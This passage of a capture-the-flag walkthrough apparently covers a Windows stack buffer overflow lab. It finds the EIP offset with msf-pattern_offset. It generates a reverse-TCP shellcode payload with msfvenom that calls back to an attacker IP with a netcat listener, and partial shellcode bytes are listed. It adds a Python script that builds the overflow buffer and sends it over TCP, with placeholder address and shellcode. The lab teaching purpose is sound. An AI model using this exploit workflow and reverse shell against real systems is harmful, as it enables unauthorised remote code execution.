Use msf-pattern_offset to find the EIP offset once the crash has been triggered with a cyclic pattern (msf-pattern_create -l 2500) and the value left in EIP has been noted:
root@kali:/home/kali/thm/brainstorm# msf-pattern_offset -l 2500 -q 31704330
[*] Exact match at offset 2012
Create shellcode using MSFVenom:
root@kali:/home/kali/thm/brainstorm# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.20 LPORT=1234 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1712 bytes
buf =  b""
buf += b"\xba\x40\xfd\xb6\x4c\xd9\xe9\xd9\x74\x24\xf4\x58\x31"
buf += b"\xc9\xb1\x52\x83\xc0\x04\x31\x50\x0e\x03\x10\xf3\x54"
buf += b"\xb9\x6c\xe3\x1b\x42\x8c\xf4\x7b\xca\x69\xc5\xbb\xa8"
Those parameters explained:
-p windows/shell_reverse_tcp = Payload is a stageless Windows x86 reverse TCP shell (the whole shell is in the 351 bytes, no second stage to download)
LHOST=192.168.0.20 = IP to connect back to, i.e. my Kali machine
LPORT=1234 = Port to connect back to on Kali (listener: nc -lvnp 1234)
EXITFUNC=thread = Exit method; the shellcode ends only its own thread rather than the whole process, so the service stays up once the shell is spawned
-f py = Output the payload as Python (buf += b"...") for our exploit script
-e x86/shikata_ga_nai = Which encoder to use; here it is only there to strip the bad characters, not for AV evasion
-b "\x00" = Bad characters to avoid (the null byte terminates C strings, so it would cut the buffer short; run a bad-character test first to confirm nothing else is mangled)
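The two steps above (offset from the EIP value, then assembling padding + return address + shellcode) as an added, self-contained Python example. This is not code from the original write-up: it re-implements the msf-pattern_create / msf-pattern_offset logic so the 2012 result can be checked offline, and the target host/port, the JMP ESP address (0xDEADBEEF is a placeholder) and the INT3 stand-in for the msfvenom buf are assumptions, not values from the page.

```python
"""Added example, not from the original write-up: pure-Python stand-ins for
msf-pattern_create / msf-pattern_offset, plus assembly of the exploit buffer
that the msfvenom output is pasted into."""
import socket
import string
import struct

# Bad characters passed to msfvenom via -b; the exploit must never contain them.
BAD_CHARS = b"\x00"


def pattern_create(length):
    """Same sequence as msf-pattern_create: Aa0Aa1...Aa9Ab0... in 3-byte groups."""
    groups = [u + l + d
              for u in string.ascii_uppercase
              for l in string.ascii_lowercase
              for d in string.digits]
    full = "".join(groups)  # 20280 bytes, the single-pass maximum
    if length > len(full):
        raise ValueError("length exceeds one pass of the pattern")
    return full[:length]


def pattern_offset(eip_hex, length=2500):
    """Offset into the pattern of the 4 bytes that landed in EIP.

    EIP is displayed as a little-endian DWORD, so 0x31704330 is the byte
    sequence b'0Cp1' as it appeared in the sent buffer."""
    needle = struct.pack("<I", int(eip_hex, 16)).decode("ascii")
    idx = pattern_create(length).find(needle)
    if idx == -1:
        raise ValueError("EIP value not found in pattern; wrong length or not a pattern crash")
    return idx


def has_bad_chars(blob, bad_chars=BAD_CHARS):
    """Return the list of bad characters present in blob (empty list if clean)."""
    return [b for b in bad_chars if b in blob]


def build_exploit(offset, ret_addr, shellcode, bad_chars=BAD_CHARS, nop_len=16):
    """padding (offset bytes) + little-endian return address + NOP sled + shellcode.

    ret_addr is assumed to be a JMP ESP gadget so execution lands on the sled.
    Both the address and the shellcode are checked against the bad-char list,
    because a single \\x00 would truncate the string on the target."""
    ret = struct.pack("<I", ret_addr)
    for name, blob in (("return address", ret), ("shellcode", shellcode)):
        hit = has_bad_chars(blob, bad_chars)
        if hit:
            raise ValueError(f"{name} contains bad char(s): {hit}")
    return b"A" * offset + ret + b"\x90" * nop_len + shellcode


def send_exploit(host, port, payload, prefix=b"", timeout=5):
    """Deliver the buffer over TCP. prefix is any protocol chatter the service
    expects before the overflowing field (assumption: none by default)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)
        s.sendall(prefix + payload + b"\r\n")


if __name__ == "__main__":
    # EIP value from the crash above; expect 2012.
    print("offset:", pattern_offset("31704330"))
    # Placeholders: paste the msfvenom buf in place of the INT3 stand-in and
    # use the real JMP ESP address; 0xDEADBEEF is only an illustration.
    shellcode = b"\xcc" * 351
    payload = build_exploit(2012, 0xDEADBEEF, shellcode)
    print("payload length:", len(payload))
    # send_exploit("10.10.10.10", 9999, payload)  # assumed target, not from the page
```

The bad-character check is the part worth keeping: an address such as 0x00401000 is rejected before it is sent, which is exactly the failure mode -b "\x00" is there to avoid in the shellcode.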
Walkthroughs here for reversing/binary exploitation: